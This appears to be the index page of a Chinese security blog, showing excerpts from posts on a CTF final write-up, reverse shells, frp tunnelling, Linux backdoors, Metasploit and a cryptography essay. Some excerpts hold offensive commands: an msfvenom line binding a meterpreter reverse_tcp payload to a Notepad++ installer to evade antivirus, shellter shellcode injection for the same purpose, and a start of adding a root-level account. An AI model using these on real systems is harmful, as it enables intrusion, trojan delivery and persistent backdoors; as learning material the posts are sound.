30k27 分钟

本周三(2022/6/8)我们队伍(中国矿业大学 02 队)代表中国矿业大学参加了 2021一带一路暨金砖大赛之企业信息系统安全赛项 的决赛,也顺利地以 1700/2000 分拿到了 CTF 的第一名。 比赛中我们一同解出了 Crypto,Re,Pwn 方向的所有赛题,赛后认真对解题思路做了整理,对剩余未解出的少部分赛题也做了复现总结: # Web 感觉题目都是常见的简单知识点,没什么太难的地方,唯一的难点就是有点谜语人,一堆登录框,没任何提示,就是要一顿乱莽 # web1 http://101.133.134.12:8001/
8.6k8 分钟

# PWN # nc 这题就不说了吧,连上啥都有,我连要用到的命令解释都给了~ # ret2text 看一下保护: 主函数: 后门函数: 栈溢出就行,一张好图理解一下: 思路:用 ‘a' 覆盖 buf 一直到覆盖上 ebp,然后将 ret (返回地址) 的地方写入为后门函数的地址。 双击左侧栏的 backdoor 函数,右侧能找到函数地址如图: 直接照思路这么写,能打通本地,但是会打不通远程,因为栈帧没有平衡(hint),这时候中间插个 retn 的 gadget 就能解决。 随便找个 retn 的地址 这个就能用: 最后,脚本如下(环境没关,可以继续打远程): 123
8.3k8 分钟

# 什么是反弹 shell? 正向连接,就是攻击者用自己的攻击机连接到目标主机的某一端口,常见的有 web 服务、ssh、远程桌面等等。 在实际情况下,总会有很多时候,我们不能通过正向连接访问到目标主机,这个时候就可以利用反向连接来实现。 反向连接,通俗来说就是,攻击者监听某个攻击机的指定端口,目标主机主动发起请求到该端口,并将命令行的输入输出转到攻击机上显示。 # 适用情况 反弹 shell 适用于如下几种常见的情况: 目标机因防火墙受限,目标机器只能发送请求,不能接收请求。 所以让目标机主动发送请求到攻击机指定端口来 getshell <br> 目标机端口被占用。 但
2.1k2 分钟

测试杀软:360 全家桶 # MSF msfconsole mp_npp:(2022/4/16) msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.158.139 LPORT=4444 -x npp.8.1.4.Installer.exe -f exe > mp_npp.exe <br> 监听: use exploit/multi/handler set payload windows/meterpreter
6.2k6 分钟

# 准备 frps 部署机。 要求:拥有 公网 IP (例如 VPS、云服务器等等) 本文选用 Ubuntu 18.04.6 云服务器 frpc 客户机。 要求:能访问互联网 本文选用 Kali Linux 2022 虚拟机 frp 的 Github 项目地址:fatedier/frp # frps(云服务器) # 下载安装 Github 项目 上找到最新的 releases : 在 云服务器 终端上下载: wget https://github.com/fatedier/frp/releases/dow
3.4k3 分钟

shellter 是一个捆绑工具,采用动态 shellcode 注入 的方式,将 shellcode 注入到其它程序中,达到免杀的效果,躲避杀软的查杀。 # shellter 安装 添加 i386 32 位 架构支持、更新 apt、安装 wine 依赖: dpkg --add-architecture i386 && apt update && apt -y install wine32 安装 shellter: apt install shellter # shellter 使用 使用 shellter 捆绑 Meterpreter_
2.9k3 分钟

整理好了搭环境的文章:LINUX 后门复现环境搭建 攻击者在通过各种手段获得服务器的控制权之后,通常会在服务器上布置一些脚本、进程、链接,即所谓的后门。其目的是,方便攻击者以后对该服务器进行持久性的攻击。 其中,在 linux 服务器上留后门的常见技术,本文中会提及如下几种: SSH 公钥免密 crontab 后门 ... # SSH 公钥免密 简而言之,SSH 公钥免密就是,将攻击者生成的 ssh 公钥写到目标服务器的 /root/.ssh/authorized_keys 中(手动在目标机上完成注册), 然后攻击者就可以利用对应的私钥免密登录。 实现:
10k9 分钟

整理好了搭环境的文章:LINUX 后门复现环境搭建 攻击者在通过各种手段获得服务器的控制权之后,通常会在服务器上布置一些脚本、进程、链接,即所谓的后门。其目的是,方便攻击者以后对该服务器进行持久性的攻击。 其中,在 linux 服务器上留后门的常见技术,本文中会提及如下几种: 增加用户账号 破解用户密码 放置 SUID Shell PAM 后门 SSH 软链接后门 ... # 增加用户账号 前提:getshell,已获得服务器的 root 权限 # uid=0 用户可远程登陆 可以通过下面这一行指令,增加一个超级用户账号: echo "用户名:x:0:0::&#x
4.5k4 分钟

Metasploit 是一个开源的,可用来发现、验证并利用漏洞的渗透测试平台。 Kali 中默认安装了 Metasploit 框架。 # msfvenom 命令实现木马生成、捆绑以及免杀处理 简介: msfvenom 是 Metasploit 中的一个命令。 msfvenom 命令结合了 msfpayload 和 msfencoder 的功能,能够生成木马,并实现木马编码免杀和避免坏字符、捆绑木马等。 # msfvenom 命令用法 涉及到的选项有: -l:列出指定模块(包括 payloads, encoders, nops, platforms, archs, encrypt, form
4.4k4 分钟

作业 (o′┏▽┓`o) # 数学思维在密码学中的应用 在进行具体阐述之前,我认为有必要初步介绍一下密码学 # 密码学介绍 我认为密码学要探讨的问题,就是如何更好地进行信息加密、防止信息泄露。 密码学有数千年的历史。最开始为了防止信息泄露,会采取诸如,将信息用特殊的化学墨水写在纸上加以隐藏的手段, 但是这样的保密措施非常容易破解,但凡知道这个方法,就能轻易地读取隐藏地信息。 所以就诞生了密码 —— 一种通过密钥加密信息的手段 # 古典密码 1976 年以前的密码都属于古典密码, 古典密码有很多种,基本地可以大致分为两种,换位密码和替换密码。 简单来说,换位密码就是把明文(需加密的信息)